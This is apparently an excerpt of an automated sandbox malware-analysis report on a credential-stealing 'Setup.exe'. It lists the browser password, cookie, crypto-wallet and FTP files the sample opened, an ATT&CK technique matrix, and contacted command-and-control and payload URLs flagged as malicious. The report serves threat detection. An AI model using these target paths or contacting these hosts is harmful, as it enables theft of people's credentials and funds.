              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              121
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory121
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager121
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Setup.exe4%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://beefshooti.click:443/apiN0%Avira URL Cloudsafe
              https://beefshooti.click:443/api2o4p.default-release/key4.dbPK0%Avira URL Cloudsafe
              https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt100%Avira URL Cloudmalware
              https://klipcatepiu0.shop/int_clp_ldr_sha.txt100%Avira URL Cloudmalware
              https://beefshooti.click/apiA0%Avira URL Cloudsafe
              https://beefshooti.click:443/api0%Avira URL Cloudsafe
              https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ100%Avira URL Cloudmalware
              https://neqi.shop/sdgjyut/psh.txt100%Avira URL Cloudmalware
              https://klipcatepiu0.shop/100%Avira URL Cloudmalware
              beefshooti.click0%Avira URL Cloudsafe
              https://beefshooti.click/apij0%Avira URL Cloudsafe
              https://beefshooti.click/aN0%Avira URL Cloudsafe
              https://klipcatepiu0.shop/hB100%Avira URL Cloudmalware
              https://beefshooti.click/apiN0%Avira URL Cloudsafe
              https://neqi.shop/sdgjyut/psh.txtM100%Avira URL Cloudmalware
              https://beefshooti.click/0%Avira URL Cloudsafe
              https://beefshooti.click/apih3=0%Avira URL Cloudsafe
              https://neqi.shop:443/sdgjyut/psh.txt100%Avira URL Cloudmalware
              https://beefshooti.click/api0%Avira URL Cloudsafe
              https://klipcatepiu0.shop/int_clp_ldr_sha.txtS100%Avira URL Cloudmalware
              https://beefshooti.click/asse0%Avira URL Cloudsafe
              https://neqi.shop/sdgjyut/psh.txtf5100%Avira URL Cloudmalware
              https://beefshooti.click:443/apim0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              beefshooti.click
              104.21.18.185
              truetrue
                unknown
                neqi.shop
                104.21.27.229
                truefalse
                  high
                  klipcatepiu0.shop
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    curverpluch.latfalse
                      high
                      slipperyloo.latfalse
                        high
                        tentabatte.latfalse
                          high
                          manyrestro.latfalse
                            high
                            beefshooti.clicktrue
                            • Avira URL Cloud: safe
                            unknown
                            https://neqi.shop/sdgjyut/psh.txtfalse
                            • Avira URL Cloud: malware
                            unknown
                            bashfulacid.latfalse
                              high
                              wordyfindy.latfalse
                                high
                                shapestickyr.latfalse
                                  high
                                  talkynicer.latfalse
                                    high
                                    https://beefshooti.click/apitrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://klipcatepiu0.shop:443/int_clp_ldr_sha.txtSetup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://klipcatepiu0.shop/int_clp_ldr_sha.txtSetup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1998761099.0000000001060000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://beefshooti.click/apiASetup.exe, 00000000.00000003.1851207669.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://go.microspowershell.exe, 00000004.00000002.2018847996.0000000004A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://beefshooti.click:443/api2o4p.default-release/key4.dbPKSetup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://beefshooti.click:443/apiNSetup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.remobjects.com/psSetup.exefalse
                                                    high
                                                    http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.innosetup.com/Setup.exefalse
                                                                  high
                                                                  https://klipcatepiu0.shop/Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZSetup.exe, 00000000.00000002.1998349657.000000000100D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://beefshooti.click:443/apiSetup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://beefshooti.click/aNSetup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
